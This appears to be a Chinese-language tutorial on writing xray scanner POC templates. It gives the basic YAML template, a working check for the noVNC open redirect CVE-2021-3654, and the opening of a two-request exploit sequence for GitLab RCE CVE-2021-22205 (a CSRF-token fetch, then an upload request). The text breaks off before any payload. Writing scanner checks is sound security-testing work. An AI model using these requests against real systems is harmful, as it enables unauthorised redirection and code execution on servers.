编写POC
以xray为例
插件编写
官方公布最基础的POC如下
name: poc-yaml-example-com
# 脚本部分
transport: http
rules:
r1:
request:
method: GET
path: "/"
expression: |
response.status==200 && response.body.bcontains(b'Example Domain')
expression:
r1()
# 信息部分
detail:
author: name(link)
links:
- http://example.com
编写编辑器
poc实践
CVE-2021-3654
路径处理出了问题,网站域名加上//example.com/%2f..即可进行url跳转
直接get请求,所以poc很简单,有手就行。
name: poc-yaml-novnc-url-redirection-cve-2021-3654
manual: true
transport: http
rules:
- method: GET
path: "//baidu.com/%2f.."
follow_redirects: false
expression: |
response.headers['location']=="//baidu.com/%2f../"
detail:
author: txf(https://github.com/tangxiaofeng7)
links:
- https://seclists.org/oss-sec/2021/q3/188
CVE-2021-22205
exiftool解析造成的rce
一共发送2个请求
请求1:
GET /users/sign_in HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
获取csrf-token
请求2:
POST /uploads/user HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundar